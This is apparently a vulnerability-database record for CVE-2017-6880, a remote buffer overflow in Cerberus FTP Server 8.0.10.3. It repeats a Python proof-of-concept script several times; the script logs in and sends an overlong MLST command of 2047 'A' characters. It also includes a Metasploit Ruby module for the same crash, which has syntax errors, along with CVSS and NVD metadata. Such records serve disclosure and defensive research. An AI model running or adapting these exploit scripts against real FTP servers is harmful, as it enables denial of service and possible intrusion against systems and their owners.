ID EXPLOITPACK:069C0DE3BF636F433C448A3191EEA598
Type exploitpack
Reporter Nassim Asrir
Modified 2017-03-16T00:00:00
Description
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
import socket
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.1.81',21))
s.recv(1024)
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
s.send('MLST ' + bad_char + '\r\n')
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
{"lastseen": "2020-04-01T19:04:08", "references": [], "description": "\nCerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)", "edition": 1, "reporter": "Nassim Asrir", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2017-03-16T00:00:00", "title": "Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-6880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142502"]}, {"type": "exploitdb", "idList": ["EDB-ID:41620"]}, {"type": "zdt", "idList": ["1337DAY-ID-27340"]}], "modified": "2020-04-01T19:04:08", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2020-04-01T19:04:08", "rev": 2}, "vulnersScore": 6.5}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-03-16T00:00:00", "id": "EXPLOITPACK:069C0DE3BF636F433C448A3191EEA598", "href": "", "viewCount": 1, "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\n[+] Credits / Discovery: Nassim Asrir\n[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/\n[+] Author Company: Henceforth\n[+] CVE: CVE-2017-6880\n\nVendor:\n===============\n\nhttps://www.cerberusftp.com/\n \n \nDownload:\n===========\n\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\n \n \nVulnerability Type:\n===================\n\nRemote Buffer Overflow.\n\n\nissue:\n===================\n\nThis problem happens when the Attacker send the bad char \"A\" in the command \"MLST\" (2047).\n \nPOC:\n===================\n#Simple POC by Nassim Asrir from Henceforth.\nimport socket\nbad_char = \"A\"*2047\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nconnect=s.connect(('192.168.1.81',21))\ns.recv(1024)\ns.send('USER nassim\\r\\n')\ns.recv(1024)\ns.send('PASS mypass\\r\\n')\ns.recv(1024)\ns.send('MLST ' + bad_char + '\\r\\n')\ns.close()\n\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\n \nTested on:\n=============== \n\nWindows 7 Sp1 (64 Bit)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}
{"cve": [{"lastseen": "2020-10-03T13:07:47", "description": "Buffer overflow in Cerberus FTP Server 8.0.10.3 allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long MLST command.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-17T17:59:00", "title": "CVE-2017-6880", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6880"], "modified": "2017-03-21T16:54:00", "cpe": ["cpe:/a:cerberus:cerberus_ftp_server:8.0.10.3"], "id": "CVE-2017-6880", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6880", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerberus:cerberus_ftp_server:8.0.10.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-05T03:18:16", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2017-03-17T00:00:00", "type": "zdt", "title": "Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-03-17T00:00:00", "href": "https://0day.today/exploit/description/27340", "id": "1337DAY-ID-27340", "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\r\n[+] Credits / Discovery: Nassim Asrir\r\n[+] Author Contact: [email\u00a0protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n[+] Author Company: Henceforth\r\n[+] CVE: CVE-2017-6880\r\n \r\nVendor:\r\n===============\r\n \r\nhttps://www.cerberusftp.com/\r\n \r\n \r\nDownload:\r\n===========\r\n \r\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\r\n \r\n \r\nVulnerability Type:\r\n===================\r\n \r\nRemote Buffer Overflow.\r\n \r\n \r\nissue:\r\n===================\r\n \r\nThis problem happens when the Attacker send the bad char \"A\" in the command \"MLST\" (2047).\r\n \r\nPOC:\r\n===================\r\n#Simple POC by Nassim Asrir from Henceforth.\r\nimport socket\r\nbad_char = \"A\"*2047\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.1.81',21))\r\ns.recv(1024)\r\ns.send('USER nassim\\r\\n')\r\ns.recv(1024)\r\ns.send('PASS mypass\\r\\n')\r\ns.recv(1024)\r\ns.send('MLST ' + bad_char + '\\r\\n')\r\ns.close()\r\n \r\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\r\n \r\nTested on:\r\n=============== \r\n \r\nWindows 7 Sp1 (64 Bit)\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27340", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-05-16T03:27:08", "description": "", "published": "2017-05-15T00:00:00", "type": "packetstorm", "title": "Cerberus FTP 8.0.10.3 MLST Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-05-15T00:00:00", "id": "PACKETSTORM:142502", "href": "https://packetstormsecurity.com/files/142502/Cerberus-FTP-8.0.10.3-MLST-Buffer-Overflow.html", "sourceData": "`#!/usr/share/ruby \n \n#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow \n#[+] Credits / Discovery: Nassim Asrir \n#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ \n#[+] Metasploit Module Author : Souhardya Sardar \n#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com \n#[+] Author Company: Henceforth \n#[+] CVE: CVE-2017-6880 \n \n#Vendor: \n#=============== \n# \n#https://www.cerberusftp.com/ \n \n \n#Download: \n#=========== \n# \n#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit) \n \n \n#Vulnerability Type: \n#=================== \n# \n#Remote Buffer Overflow. \n \n \n \n# ---------------------------- \n# Module Dependencies/requires \n# ---------------------------- \n \nrequire 'msf/core' \n \n# ---------------------------------- \n# Metasploit Class name and includes \n# ---------------------------------- \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Ftp \n \n# ----------------------------------------- \n# Initialize information \n# ----------------------------------------- \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Cerber FTP Remote Buffer Overflow ', \n'Description' => %q{ \nThis module exploits a buffer overflow in the Cerber FTP client that is triggered \nby sending a bad char \"A\" in the command \"MLST\" (2047) . \n}, \n \n'Author' => \n[ \n'Module Author And Bug Discovered by : Peter Baris', \n'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :) \n'Thanks to : Nidhish Pandya ', #auditing:) \n \n \n], \n'License' => NONE, \n'Platform' => ['win'] \n \n'References' => \n[ \n[ 'CVE', 'CVE-2017-6880' ], \n[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ] \n \n])) \n \nregister_optionsOptPort.new('SRVPORT', [true, \"The remote FTP server port\", 21]) \n], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \nend \n \ndef exploit \nconnect \n \npayload = \"A\"*2047 \n \nprint_status(\"Trying to connect to target server {target.name...\") \n \n \nsock.put('MLST ' + payload + '\\r\\n') \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142502/cerberusftp-overflow.rb.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:32:51", "description": "", "published": "2017-03-16T00:00:00", "type": "exploitdb", "title": "Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-03-16T00:00:00", "id": "EDB-ID:41620", "href": "https://www.exploit-db.com/exploits/41620", "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\r\n[+] Credits / Discovery: Nassim Asrir\r\n[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n[+] Author Company: Henceforth\r\n[+] CVE: CVE-2017-6880\r\n\r\nVendor:\r\n===============\r\n\r\nhttps://www.cerberusftp.com/\r\n \r\n \r\nDownload:\r\n===========\r\n\r\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\r\n \r\n \r\nVulnerability Type:\r\n===================\r\n\r\nRemote Buffer Overflow.\r\n\r\n\r\nissue:\r\n===================\r\n\r\nThis problem happens when the Attacker send the bad char \"A\" in the command \"MLST\" (2047).\r\n \r\nPOC:\r\n===================\r\n#Simple POC by Nassim Asrir from Henceforth.\r\nimport socket\r\nbad_char = \"A\"*2047\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.1.81',21))\r\ns.recv(1024)\r\ns.send('USER nassim\\r\\n')\r\ns.recv(1024)\r\ns.send('PASS mypass\\r\\n')\r\ns.recv(1024)\r\ns.send('MLST ' + bad_char + '\\r\\n')\r\ns.close()\r\n\r\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\r\n \r\nTested on:\r\n=============== \r\n\r\nWindows 7 Sp1 (64 Bit)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41620"}]}
